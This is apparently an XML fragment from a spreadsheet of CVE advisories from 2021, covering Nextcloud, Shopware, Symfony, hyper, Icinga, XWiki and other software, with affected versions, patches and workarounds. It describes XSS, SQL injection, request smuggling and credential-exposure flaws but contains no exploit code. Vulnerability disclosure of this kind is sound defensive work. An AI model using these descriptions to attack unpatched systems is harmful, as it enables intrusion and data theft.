    <t>CVE-2021-32693</t>
  </si>
  <si>
    <t>Symfony is a PHP framework for web and console applications and a set of reusable PHP components. A vulnerability related to firewall authentication is in Symfony starting with version 5.3.0 and prior to 5.3.2. When an application defines multiple firewalls, the token authenticated by one of the firewalls was available for all other firewalls. This could be abused when the application defines different providers for each part of the application, in such a situation, a user authenticated on a part of the application could be considered authenticated on the rest of the application. Starting in version 5.3.2, a patch ensures that the authenticated token is only available for the firewall that generates it.</t>
  </si>
  <si>
    <t>CVE-2021-32694</t>
  </si>
  <si>
    <t>Nextcloud Android app is the Android client for Nextcloud. In versions prior to 3.15.1, a malicious application on the same device is possible to crash the Nextcloud Android Client due to an uncaught exception. The vulnerability is patched in version 3.15.1.</t>
  </si>
  <si>
    <t>CVE-2021-32695</t>
  </si>
  <si>
    <t>Nextcloud Android app is the Android client for Nextcloud. In versions prior to 3.16.1, a malicious app on the same device could have gotten access to the shared preferences of the Nextcloud Android application. This required user-interaction as a victim had to initiate the sharing flow and choose the malicious app. The shared preferences contain some limited private data such as push tokens and the account name. The vulnerability is patched in version 3.16.1.</t>
  </si>
  <si>
    <t>CVE-2021-32696</t>
  </si>
  <si>
    <t>The npm package "striptags" is an implementation of PHP's strip_tags in Typescript. In striptags before version 3.2.0, a type-confusion vulnerability can cause `striptags` to concatenate unsanitized strings when an array-like object is passed in as the `html` parameter. This can be abused by an attacker who can control the shape of their input, e.g. if query parameters are passed directly into the function. This can lead to a XSS.</t>
  </si>
  <si>
    <t>CVE-2021-32697</t>
  </si>
  <si>
    <t>neos/forms is an open source framework to build web forms. By crafting a special `GET` request containing a valid form state, a form can be submitted without invoking any validators. Form state is secured with an HMAC that is still verified. That means that this issue can only be exploited if Form Finishers cause side effects even if no form values have been sent. Form Finishers can be adjusted in a way that they only execute an action if the submitted form contains some expected data. Alternatively a custom Finisher can be added as first finisher. This regression was introduced with https://github.com/neos/form/commit/049d415295be8d4a0478ccba97dba1bb81649567</t>
  </si>
  <si>
    <t>CVE-2021-32698</t>
  </si>
  <si>
    <t>eLabFTW is an open source electronic lab notebook for research labs. This vulnerability allows an attacker to make GET requests on behalf of the server. It is "blind" because the attacker cannot see the result of the request. Issue has been patched in eLabFTW 4.0.0.</t>
  </si>
  <si>
    <t>CVE-2021-32699</t>
  </si>
  <si>
    <t>Wings is the control plane software for the open source Pterodactyl game management system. All versions of Pterodactyl Wings prior to `1.4.4` are vulnerable to system resource exhaustion due to improper container process limits being defined. A malicious user can consume more resources than intended and cause downstream impacts to other clients on the same hardware, eventually causing the physical server to stop responding. Users should upgrade to `1.4.4` to mitigate the issue. There is no non-code based workaround for impacted versions of the software. Users running customized versions of this software can manually set a PID limit for containers created.</t>
  </si>
  <si>
    <t>CVE-2021-32700</t>
  </si>
  <si>
    <t>Ballerina is an open source programming language and platform for cloud application programmers. Ballerina versions 1.2.x and SL releases up to alpha 3 have a potential for a supply chain attack via MiTM against users. Http connections did not make use of TLS and certificate checking was ignored. The vulnerability allows an attacker to substitute or modify packages retrieved from BC thus allowing to inject malicious code into ballerina executables. This has been patched in Ballerina 1.2.14 and Ballerina SwanLake alpha4.</t>
  </si>
  <si>
    <t>CVE-2021-32701</t>
  </si>
  <si>
    <t>ORY Oathkeeper is an Identity &amp; Access Proxy (IAP) and Access Control Decision API that authorizes HTTP requests based on sets of Access Rules. When you make a request to an endpoint that requires the scope `foo` using an access token granted with that `foo` scope, introspection will be valid and that token will be cached. The problem comes when a second requests to an endpoint that requires the scope `bar` is made before the cache has expired. Whether the token is granted or not to the `bar` scope, introspection will be valid. A patch will be released with `v0.38.12-beta.1`. Per default, caching is disabled for the `oauth2_introspection` authenticator. When caching is disabled, this vulnerability does not exist. The cache is checked in [`func (a *AuthenticatorOAuth2Introspection) Authenticate(...)`](https://github.com/ory/oathkeeper/blob/6a31df1c3779425e05db1c2a381166b087cb29a4/pipeline/authn/authenticator_oauth2_introspection.go#L152). From [`tokenFromCache()`](https://github.com/ory/oathkeeper/blob/6a31df1c3779425e05db1c2a381166b087cb29a4/pipeline/authn/authenticator_oauth2_introspection.go#L97) it seems that it only validates the token expiration date, but ignores whether the token has or not the proper scopes. The vulnerability was introduced in PR #424. During review, we failed to require appropriate test coverage by the submitter which is the primary reason that the vulnerability passed the review process.</t>
  </si>
  <si>
    <t>CVE-2021-32702</t>
  </si>
  <si>
    <t>The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. Versions before and including `1.4.1` are vulnerable to reflected XSS. An attacker can execute arbitrary code by providing an XSS payload in the `error` query parameter which is then processed by the callback handler as an error message. You are affected by this vulnerability if you are using `@auth0/nextjs-auth0` version `1.4.1` or lower **unless** you are using custom error handling that does not return the error message in an HTML response. Upgrade to version `1.4.1` to resolve. The fix adds basic HTML escaping to the error message and it should not impact your users.</t>
  </si>
  <si>
    <t>CVE-2021-32703</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.011, and 21.0.3, there was a lack of ratelimiting on the shareinfo endpoint. This may have allowed an attacker to enumerate potentially valid share tokens. The issue was fixed in versions 19.0.13, 20.0.11, and 21.0.3. There are no known workarounds.</t>
  </si>
  <si>
    <t>CVE-2021-32704</t>
  </si>
  <si>
    <t>DHIS 2 is an information system for data capture, management, validation, analytics and visualization. A SQL injection security vulnerability has been found in specific versions of DHIS2. This vulnerability affects the /api/trackedEntityInstances API endpoint in DHIS2 versions 2.34.4, 2.35.2, 2.35.3, 2.35.4, and 2.36.0. Earlier versions, such as 2.34.3 and 2.35.1 and all versions 2.33 and older are unaffected. The system is vulnerable to attack only from users that are logged in to DHIS2, and there is no known way of exploiting the vulnerability without first being logged in as a DHIS2 user. A successful exploit of this vulnerability could allow the malicious user to read, edit and delete data in the DHIS2 instance. There are no known exploits of the security vulnerabilities addressed by these patch releases. However, we strongly recommend that all DHIS2 implementations using versions 2.34, 2.35 and 2.36 install these patches as soon as possible. There is no straightforward known workaround for DHIS2 instances using the Tracker functionality other than upgrading the affected DHIS2 server to one of the patches in which this vulnerability has been fixed. For implementations which do NOT use Tracker functionality, it may be possible to block all network access to POST to the /api/trackedEntityInstance endpoint as a temporary workaround while waiting to upgrade.</t>
  </si>
  <si>
    <t>CVE-2021-32705</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.011, and 21.0.3, there was a lack of ratelimiting on the public DAV endpoint. This may have allowed an attacker to enumerate potentially valid share tokens or credentials. The issue was fixed in versions 19.0.13, 20.0.11, and 21.0.3. There are no known workarounds.</t>
  </si>
  <si>
    <t>CVE-2021-32706</t>
  </si>
  <si>
    <t>Pi-hole's Web interface provides a central location to manage a Pi-hole instance and review performance statistics. Prior to Pi-hole Web interface version 5.5.1, the `validDomainWildcard` preg_match filter allows a malicious character through that can be used to execute code, list directories, and overwrite sensitive files. The issue lies in the fact that one of the periods is not escaped, allowing any character to be used in its place. A patch for this vulnerability was released in version 5.5.1.</t>
  </si>
  <si>
    <t>CVE-2021-32707</t>
  </si>
  <si>
    <t>Nextcloud Mail is a mail app for Nextcloud. In versions prior to 1.9.6, the Nextcloud Mail application does not, by default, render images in emails to not leak the read state. The privacy filter failed to filter images with a `background-image` CSS attribute. Note that the images were still passed through the Nextcloud image proxy, and thus there was no IP leakage. The issue was patched in version 1.9.6 and 1.10.0. No workarounds are known to exist.</t>
  </si>
  <si>
    <t>CVE-2021-32708</t>
  </si>
  <si>
    <t>Flysystem is an open source file storage library for PHP. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: A user is allowed to supply the path or filename of an uploaded file, the supplied path or filename is not checked against unicode chars, the supplied pathname checked against an extension deny-list, not an allow-list, the supplied path or filename contains a unicode whitespace char in the extension, the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.</t>
  </si>
  <si>
    <t>CVE-2021-32709</t>
  </si>
  <si>
    <t>Shopware is an open source eCommerce platform. Creation of order credits was not validated by ACL in admin orders. Users are recommend to update to the current version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.</t>
  </si>
  <si>
    <t>CVE-2021-3271</t>
  </si>
  <si>
    <t>PressBooks 5.17.3 contains a cross-site scripting (XSS). Stored XSS can be submitted via the Book Info's Long Description Body, and all actions to open or preview the books page will result in the triggering the stored XSS.</t>
  </si>
  <si>
    <t>CVE-2021-32710</t>
  </si>
  <si>
    <t>Shopware is an open source eCommerce platform. Potential session hijacking of store customers in versions below 6.3.5.2. We recommend to update to the current version 6.3.5.2. You can get the update to 6.3.5.2 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.</t>
  </si>
  <si>
    <t>CVE-2021-32711</t>
  </si>
  <si>
    <t>Shopware is an open source eCommerce platform. Versions prior to 6.3.5.1 may leak of information via Store-API. The vulnerability could only be fixed by changing the API system, which involves a non-backward-compatible change. Only consumers of the Store-API should be affected by this change. We recommend to update to the current version 6.3.5.1. You can get the update to 6.3.5.1 regularly via the Auto-Updater or directly via the download overview. https://www.shopware.com/en/download/#shopware-6 The vulnerability could only be fixed by changing the API system, which involves a non-backward-compatible change. Only consumers of the Store-API should be affected by this change. Please check your plugins if you have it in use. Detailed technical information can be found in the upgrade information. https://github.com/shopware/platform/blob/v6.3.5.1/UPGRADE-6.3.md#6351 ### Workarounds For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 ### For more information https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021</t>
  </si>
  <si>
    <t>CVE-2021-32712</t>
  </si>
  <si>
    <t>Shopware is an open source eCommerce platform. Versions prior to 5.6.10 are vulnerable to system information leakage in error handling. Users are recommend to update to version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview.</t>
  </si>
  <si>
    <t>CVE-2021-32713</t>
  </si>
  <si>
    <t>Shopware is an open source eCommerce platform. Versions prior to 5.6.10 suffer from an authenticated stored XSS in administration vulnerability. Users are recommend to update to the version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview.</t>
  </si>
  <si>
    <t>CVE-2021-32714</t>
  </si>
  <si>
    <t>hyper is an HTTP library for Rust. In versions prior to 0.14.10, hyper's HTTP server and client code had a flaw that could trigger an integer overflow when decoding chunk sizes that are too big. This allows possible data loss, or if combined with an upstream HTTP proxy that allows chunk sizes larger than hyper does, can result in "request smuggling" or "desync attacks." The vulnerability is patched in version 0.14.10. Two possible workarounds exist. One may reject requests manually that contain a `Transfer-Encoding` header or ensure any upstream proxy rejects `Transfer-Encoding` chunk sizes greater than what fits in 64-bit unsigned integers.</t>
  </si>
  <si>
    <t>CVE-2021-32715</t>
  </si>
  <si>
    <t>hyper is an HTTP library for rust. hyper's HTTP/1 server code had a flaw that incorrectly parses and accepts requests with a `Content-Length` header with a prefixed plus sign, when it should have been rejected as illegal. This combined with an upstream HTTP proxy that doesn't parse such `Content-Length` headers, but forwards them, can result in "request smuggling" or "desync attacks". The flaw exists in all prior versions of hyper prior to 0.14.10, if built with `rustc` v1.5.0 or newer. The vulnerability is patched in hyper version 0.14.10. Two workarounds exist: One may reject requests manually that contain a plus sign prefix in the `Content-Length` header or ensure any upstream proxy handles `Content-Length` headers with a plus sign prefix.</t>
  </si>
  <si>
    <t>CVE-2021-32716</t>
  </si>
  <si>
    <t>Shopware is an open source eCommerce platform. In versions prior to 6.4.1.1 the admin api has exposed some internal hidden fields when an association has been loaded with a to many reference. Users are recommend to update to version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin.</t>
  </si>
  <si>
    <t>CVE-2021-32717</t>
  </si>
  <si>
    <t>Shopware is an open source eCommerce platform. In versions prior to 6.4.1.1 private files publicly accessible with Cloud Storage providers when the hashed URL is known. Users are recommend to first change their configuration to set the correct visibility according to the documentation. The visibility must be at the same level as `type`. When the Storage is saved on Amazon AWS we recommending disabling public access to the bucket containing the private files: https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html. Otherwise, update to Shopware 6.4.1.1 or install or update the Security plugin (https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659) and run the command `./bin/console s3:set-visibility` to correct your cloud file visibilities.</t>
  </si>
  <si>
    <t>CVE-2021-32718</t>
  </si>
  <si>
    <t>RabbitMQ is a multi-protocol messaging broker. In rabbitmq-server prior to version 3.8.17, a new user being added via management UI could lead to the user's bane being rendered in a confirmation message without proper `&lt;script&gt;` tag sanitization, potentially allowing for JavaScript code execution in the context of the page. In order for this to occur, the user must be signed in and have elevated permissions (other user management). The vulnerability is patched in RabbitMQ 3.8.17. As a workaround, disable `rabbitmq_management` plugin and use CLI tools for management operations and Prometheus and Grafana for metrics and monitoring.</t>
  </si>
  <si>
    <t>CVE-2021-32719</t>
  </si>
  <si>
    <t>RabbitMQ is a multi-protocol messaging broker. In rabbitmq-server prior to version 3.8.18, when a federation link was displayed in the RabbitMQ management UI via the `rabbitmq_federation_management` plugin, its consumer tag was rendered without proper &lt;script&gt; tag sanitization. This potentially allows for JavaScript code execution in the context of the page. The user must be signed in and have elevated permissions (manage federation upstreams and policies) for this to occur. The vulnerability is patched in RabbitMQ 3.8.18. As a workaround, disable the `rabbitmq_federation_management` plugin and use [CLI tools](https://www.rabbitmq.com/cli.html) instead.</t>
  </si>
  <si>
    <t>CVE-2021-3272</t>
  </si>
  <si>
    <t>jp2_decode in jp2/jp2_dec.c in libjasper in JasPer 2.0.24 has a heap-based buffer over-read when there is an invalid relationship between the number of channels and the number of image components.</t>
  </si>
  <si>
    <t>CVE-2021-32720</t>
  </si>
  <si>
    <t>Sylius is an Open Source eCommerce platform on top of Symfony. In versions of Sylius prior to 1.9.5 and 1.10.0-RC.1, part of the details (order ID, order number, items total, and token value) of all placed orders were exposed to unauthorized users. If exploited properly, a few additional information like the number of items in the cart and the date of the shipping may be fetched as well. This data seems to not be crucial nor is personal data, however, could be used for sociotechnical attacks or may expose a few details about shop condition to the third parties. The data possible to aggregate are the number of processed orders or their value in the moment of time. The problem has been patched at Sylius 1.9.5 and 1.10.0-RC.1. There are a few workarounds for the vulnerability. The first possible solution is to hide the problematic endpoints behind the firewall from not logged in users. This would put only the order list under the firewall and allow only authorized users to access it. Once a user is authorized, it will have access to theirs orders only. The second possible solution is to decorate the `\Sylius\Bundle\ApiBundle\Doctrine\QueryCollectionExtension\OrdersByLoggedInUserExtension` and throw `Symfony\Component\Security\Core\Exception\AccessDeniedException` if the class is executed for unauthorized user.</t>
  </si>
  <si>
    <t>CVE-2021-32721</t>
  </si>
  <si>
    <t>PowerMux is a drop-in replacement for Go's http.ServeMux. In PowerMux versions prior to 1.1.1, attackers may be able to craft phishing links and other open redirects by exploiting the trailing slash redirection feature. This may lead to users being redirected to untrusted sites after following an attacker crafted link. The issue is resolved in v1.1.1. There are no existing workarounds.</t>
  </si>
  <si>
    <t>CVE-2021-32722</t>
  </si>
  <si>
    <t>GlobalNewFiles is a mediawiki extension. Versions prior to 48be7adb70568e20e961ea1cb70904454a671b1d are affected by an uncontrolled resource consumption vulnerability. A large amount of page moves within a short space of time could overwhelm Database servers due to improper handling of load balancing and a lack of an appropriate index. As a workaround, one may avoid use of the extension unless additional rate limit at the MediaWiki level or via PoolCounter / MySQL is enabled. A patch is available in version 48be7adb70568e20e961ea1cb70904454a671b1d.</t>
  </si>
  <si>
    <t>CVE-2021-32723</t>
  </si>
  <si>
    <t>Prism is a syntax highlighting library. Some languages before 1.24.0 are vulnerable to Regular Expression Denial of Service (ReDoS). When Prism is used to highlight untrusted (user-given) text, an attacker can craft a string that will take a very very long time to highlight. This problem has been fixed in Prism v1.24. As a workaround, do not use ASCIIDoc or ERB to highlight untrusted text. Other languages are not affected and can be used to highlight untrusted text.</t>
  </si>
  <si>
    <t>CVE-2021-32724</t>
  </si>
  <si>
    <t>check-spelling is a github action which provides CI spell checking. In affected versions and for a repository with the [check-spelling action](https://github.com/marketplace/actions/check-spelling) enabled that triggers on `pull_request_target` (or `schedule`), an attacker can send a crafted Pull Request that causes a `GITHUB_TOKEN` to be exposed. With the `GITHUB_TOKEN`, it's possible to push commits to the repository bypassing standard approval processes. Commits to the repository could then steal any/all secrets available to the repository. As a workaround users may can either: [Disable the workflow](https://docs.github.com/en/actions/managing-workflow-runs/disabling-and-enabling-a-workflow) until you've fixed all branches or Set repository to [Allow specific actions](https://docs.github.com/en/github/administering-a-repository/managing-repository-settings/disabling-or-limiting-github-actions-for-a-repository#allowing-specific-actions-to-run). check-spelling isn't a verified creator and it certainly won't be anytime soon. You could then explicitly add other actions that your repository uses. Set repository [Workflow permissions](https://docs.github.com/en/github/administering-a-repository/managing-repository-settings/disabling-or-limiting-github-actions-for-a-repository#setting-the-permissions-of-the-github_token-for-your-repository) to `Read repository contents permission`. Workflows using `check-spelling/check-spelling@main` will get the fix automatically. Workflows using a pinned sha or tagged version will need to change the affected workflows for all repository branches to the latest version. Users can verify who and which Pull Requests have been running the action by looking up the spelling.yml action in the Actions tab of their repositories, e.g., https://github.com/check-spelling/check-spelling/actions/workflows/spelling.yml - you can filter PRs by adding ?query=event%3Apull_request_target, e.g., https://github.com/check-spelling/check-spelling/actions/workflows/spelling.yml?query=event%3Apull_request_target.</t>
  </si>
  <si>
    <t>CVE-2021-32725</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.011, and 21.0.3, default share permissions were not being respected for federated reshares of files and folders. The issue was fixed in versions 19.0.13, 20.0.11, and 21.0.3. There are no known workarounds.</t>
  </si>
  <si>
    <t>277</t>
  </si>
  <si>
    <t>CVE-2021-32726</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.011, and 21.0.3, webauthn tokens were not deleted after a user has been deleted. If a victim reused an earlier used username, the previous user could gain access to their account. The issue was fixed in versions 19.0.13, 20.0.11, and 21.0.3. There are no known workarounds.</t>
  </si>
  <si>
    <t>708</t>
  </si>
  <si>
    <t>CVE-2021-32727</t>
  </si>
  <si>
    <t>Nextcloud Android Client is the Android client for Nextcloud. Clients using the Nextcloud end-to-end encryption feature download the public and private key via an API endpoint. In versions prior to 3.16.1, the Nextcloud Android client skipped a step that involved the client checking if a private key belonged to a previously downloaded public certificate. If the Nextcloud instance served a malicious public key, the data would be encrypted for this key and thus could be accessible to a malicious actor. The vulnerability is patched in version 3.16.1. As a workaround, do not add additional end-to-end encrypted devices to a user account.</t>
  </si>
  <si>
    <t>CVE-2021-32728</t>
  </si>
  <si>
    <t>The Nextcloud Desktop Client is a tool to synchronize files from Nextcloud Server with a computer. Clients using the Nextcloud end-to-end encryption feature download the public and private key via an API endpoint. In versions prior to 3.3.0, the Nextcloud Desktop client fails to check if a private key belongs to previously downloaded public certificate. If the Nextcloud instance serves a malicious public key, the data would be encrypted for this key and thus could be accessible to a malicious actor. This issue is fixed in Nextcloud Desktop Client version 3.3.0. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-32729</t>
  </si>
  <si>
    <t>XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. A vulnerability exists in versions prior to 12.6.88, 12.10.4, and 13.0. The script service method used to reset the authentication failures record can be executed by any user with Script rights and does not require Programming rights. An attacher with script rights who is able to reset the authentication failure record might perform a brute force attack, since they would be able to virtually deactivate the mechanism introduced to mitigate those attacks. The problem has been patched in version 12.6.8, 12.10.4 and 13.0. There are no workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-3273</t>
  </si>
  <si>
    <t>Nagios XI below 5.7 is affected by code injection in the /nagiosxi/admin/graphtemplates.php component. To exploit this vulnerability, someone must have an admin user account in Nagios XI's web system.</t>
  </si>
  <si>
    <t>CVE-2021-32730</t>
  </si>
  <si>
    <t>XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. A cross-site request forgery vulnerability exists in versions prior to 12.10.5, and in versions 13.0 through 13.1. It's possible for forge an URL that, when accessed by an admin, will reset the password of any user in XWiki. The problem has been patched in XWiki 12.10.5 and 13.2RC1. As a workaround, it is possible to apply the patch manually by modifying the `register_macros.vm` template.</t>
  </si>
  <si>
    <t>CVE-2021-32731</t>
  </si>
  <si>
    <t>XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Between (and including) versions 13.1RC1 and 13.1, the reset password form reveals the email address of users just by giving their username. The problem has been patched on XWiki 13.2RC1. As a workaround, it is possible to manually modify the `resetpasswordinline.vm` to perform the changes made to mitigate the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32732</t>
  </si>
  <si>
    <t>### Impact It's possible to know if a user has or not an account in a wiki related to an email address, and which username(s) is actually tied to that email by forging a request to the Forgot username page. Note that since this page does not have a CSRF check it's quite easy to perform a lot of those requests. ### Patches This issue has been patched in XWiki 12.10.5 and 13.2RC1. Two different patches are provided: - a first one to fix the CSRF problem - a more complex one that now relies on sending an email for the Forgot username process. ### Workarounds It's possible to fix the problem without uprading by editing the ForgotUsername page in version below 13.x, to use the following code: https://github.com/xwiki/xwiki-platform/blob/69548c0320cbd772540cf4668743e69f879812cf/xwiki-platform-core/xwiki-platform-administration/xwiki-platform-administration-ui/src/main/resources/XWiki/ForgotUsername.xml#L39-L123 In version after 13.x it's also possible to edit manually the forgotusername.vm file, but it's really encouraged to upgrade the version here. ### References * https://jira.xwiki.org/browse/XWIKI-18384 * https://jira.xwiki.org/browse/XWIKI-18408 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki](https://jira.xwiki.org) * Email us at [security ML](mailto:security@xwiki.org)</t>
  </si>
  <si>
    <t>CVE-2021-32733</t>
  </si>
  <si>
    <t>Nextcloud Text is a collaborative document editing application that uses Markdown. A cross-site scripting vulnerability is present in versions prior to 19.0.13, 20.0.11, and 21.0.3. The Nextcloud Text application shipped with Nextcloud server used a `text/html` Content-Type when serving files to users. Due the strict Content-Security-Policy shipped with Nextcloud, this issue is not exploitable on modern browsers supporting Content-Security-Policy. The issue was fixed in versions 19.0.13, 20.0.11, and 21.0.3. As a workaround, use a browser that has support for Content-Security-Policy.</t>
  </si>
  <si>
    <t>CVE-2021-32734</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.011, and 21.0.3, the Nextcloud Text application shipped with Nextcloud Server returned verbatim exception messages to the user. This could result in a full path disclosure on shared files. The issue was fixed in versions 19.0.13, 20.0.11, and 21.0.3. As a workaround, one may disable the Nextcloud Text application in Nextcloud Server app settings.</t>
  </si>
  <si>
    <t>CVE-2021-32735</t>
  </si>
  <si>
    <t>Kirby is a content management system. In Kirby CMS versions 3.5.5 and 3.5.6, the Panel's `ListItem` component (used in the pages and files section for example) displayed HTML in page titles as it is. This could be used for cross-site scripting (XSS) attacks. Malicious authenticated Panel users can escalate their privileges if they get access to the Panel session of an admin user. Visitors without Panel access can use the attack vector if the site allows changing site data from a frontend form. Kirby 3.5.7 patches the vulnerability. As a partial workaround, site administrators can protect against attacks from visitors without Panel access by validating or sanitizing provided data from the frontend form.</t>
  </si>
  <si>
    <t>CVE-2021-32736</t>
  </si>
  <si>
    <t>think-helper defines a set of helper functions for ThinkJS. In versions of think-helper prior to 1.1.3, the software receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype. The vulnerability is patched in version 1.1.3.</t>
  </si>
  <si>
    <t>CVE-2021-32737</t>
  </si>
  <si>
    <t>Sulu is an open-source PHP content management system based on the Symfony framework. In versions of Sulu prior to 1.6.41, it is possible for a logged in admin user to add a script injection (cross-site-scripting) in the collection title. The problem is patched in version 1.6.41. As a workaround, one may manually patch the affected JavaScript files in lieu of updating.</t>
  </si>
  <si>
    <t>CVE-2021-32738</t>
  </si>
  <si>
    <t>js-stellar-sdk is a Javascript library for communicating with a Stellar Horizon server. The `Utils.readChallengeTx` function used in SEP-10 Stellar Web Authentication states in its function documentation that it reads and validates the challenge transaction including verifying that the `serverAccountID` has signed the transaction. In js-stellar-sdk before version 8.2.3, the function does not verify that the server has signed the transaction. Applications that also used `Utils.verifyChallengeTxThreshold` or `Utils.verifyChallengeTxSigners` to verify the signatures including the server signature on the challenge transaction are unaffected as those functions verify the server signed the transaction. Applications calling `Utils.readChallengeTx` should update to version 8.2.3, the first version with a patch for this vulnerability, to ensure that the challenge transaction is completely valid and signed by the server creating the challenge transaction.</t>
  </si>
  <si>
    <t>CVE-2021-32739</t>
  </si>
  <si>
    <t>Icinga is a monitoring system which checks the availability of network resources, notifies users of outages, and generates performance data for reporting. From version 2.4.0 through version 2.12.4, a vulnerability exists that may allow privilege escalation for authenticated API users. With a read-ony user's credentials, an attacker can view most attributes of all config objects including `ticket_salt` of `ApiListener`. This salt is enough to compute a ticket for every possible common name (CN). A ticket, the master node's certificate, and a self-signed certificate are enough to successfully request the desired certificate from Icinga. That certificate may in turn be used to steal an endpoint or API user's identity. Versions 2.12.5 and 2.11.10 both contain a fix the vulnerability. As a workaround, one may either specify queryable types explicitly or filter out ApiListener objects.</t>
  </si>
  <si>
    <t>267</t>
  </si>
  <si>
    <t>CVE-2021-32740</t>
  </si>
  <si>
    <t>Addressable is an alternative implementation to the URI implementation that is part of Ruby's standard library. An uncontrolled resource consumption vulnerability exists after version 2.3.0 through version 2.7.0. Within the URI template implementation in Addressable, a maliciously crafted template may result in uncontrolled resource consumption, leading to denial of service when matched against a URI. In typical usage, templates would not normally be read from untrusted user input, but nonetheless, no previous security advisory for Addressable has cautioned against doing this. Users of the parsing capabilities in Addressable but not the URI template capabilities are unaffected. The vulnerability is patched in version 2.8.0. As a workaround, only create Template objects from trusted sources that have been validated not to produce catastrophic backtracking.</t>
  </si>
  <si>
    <t>CVE-2021-32741</t>
  </si>
  <si>
    <t>Nextcloud Server is a Nextcloud package that handles data storage. In versions prior to 19.0.13, 20.011, and 21.0.3, there was a lack of ratelimiting on the public share link mount endpoint. This may have allowed an attacker to enumerate potentially valid share tokens. The issue was fixed in versions 19.0.13, 20.0.11, and 21.0.3. There are no known workarounds.</t>
  </si>
  <si>
    <t>CVE-2021-32742</t>
  </si>
  <si>
    <t>Vapor is a web framework for Swift. In versions 4.47.1 and prior, bug in the `Data.init(base32Encoded:)` function opens up the potential for exposing server memory and/or crashing the server (Denial of Service) for applications where untrusted data can end up in said function. Vapor does not currently use this function itself so this only impact applications that use the impacted function directly or through other dependencies. The vulnerability is patched in version 4.47.2. As a workaround, one may use an alternative to Vapor's built-in `Data.init(base32Encoded:)`.</t>
  </si>
  <si>
    <t>CVE-2021-32743</t>
  </si>
  <si>
    <t>Icinga is a monitoring system which checks the availability of network resources, notifies users of outages, and generates performance data for reporting. In versions prior to 2.11.10 and from version 2.12.0 through version 2.12.4, some of the Icinga 2 features that require credentials for external services expose those credentials through the API to authenticated API users with read permissions for the corresponding object types. IdoMysqlConnection and IdoPgsqlConnection (every released version) exposes the password of the user used to connect to the database. IcingaDB (added in 2.12.0) exposes the password used to connect to the Redis server. ElasticsearchWriter (added in 2.8.0)exposes the password used to connect to the Elasticsearch server. An attacker who obtains these credentials can impersonate Icinga to these services and add, modify and delete information there. If credentials with more permissions are in use, this increases the impact accordingly. Starting with the 2.11.10 and 2.12.5 releases, these passwords are no longer exposed via the API. As a workaround, API user permissions can be restricted to not allow querying of any affected objects, either by explicitly listing only the required object types for object query permissions, or by applying a filter rule.</t>
  </si>
  <si>
    <t>202</t>
  </si>
  <si>
    <t>CVE-2021-32744</t>
  </si>
  <si>
    <t>Collabora Online is a collaborative online office suite. In versions prior to 4.2.17-1 and version 6.4.9-5, unauthenticated attackers are able to gain access to files which are currently opened by other users in the Collabora Online editor. For successful exploitation the attacker is required to guess the file identifier - the predictability of this file identifier is dependent on external file-storage implementations (this is a potential "IDOR" - Insecure Direct Object Reference - vulnerability). Versions 4.2.17-1 and 6.4.9-5 contain patches for this issue. There is no known workaround except updating the Collabora Online application to one of the patched releases.</t>
  </si>
  <si>
    <t>CVE-2021-32745</t>
  </si>
  <si>
    <t>Collabora Online is a collaborative online office suite. A reflected XSS vulnerability was found in Collabora Online prior to version 6.4.9-5. An attacker could inject unescaped HTML into a variable as they created the Collabora Online iframe, and execute scripts inside the context of the Collabora Online iframe. This would give access to a small set of user settings stored in the browser, as well as the session's authentication token which was also passed in at iframe creation time. The issue is patched in Collabora Online 6.4.9-5. Collabora Online 4.2 is not affected.</t>
  </si>
  <si>
    <t>CVE-2021-32746</t>
  </si>
  <si>
    <t>Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Between versions 2.3.0 and 2.8.2, the `doc` module of Icinga Web 2 allows to view documentation directly in the UI. It must be enabled manually by an administrator and users need explicit access permission to use it. Then, by visiting a certain route, it is possible to gain access to arbitrary files readable by the web-server user. The issue has been fixed in the 2.9.0, 2.8.3, and 2.7.5 releases. As a workaround, an administrator may disable the `doc` module or revoke permission to use it from all users.</t>
  </si>
  <si>
    <t>CVE-2021-32747</t>
  </si>
  <si>
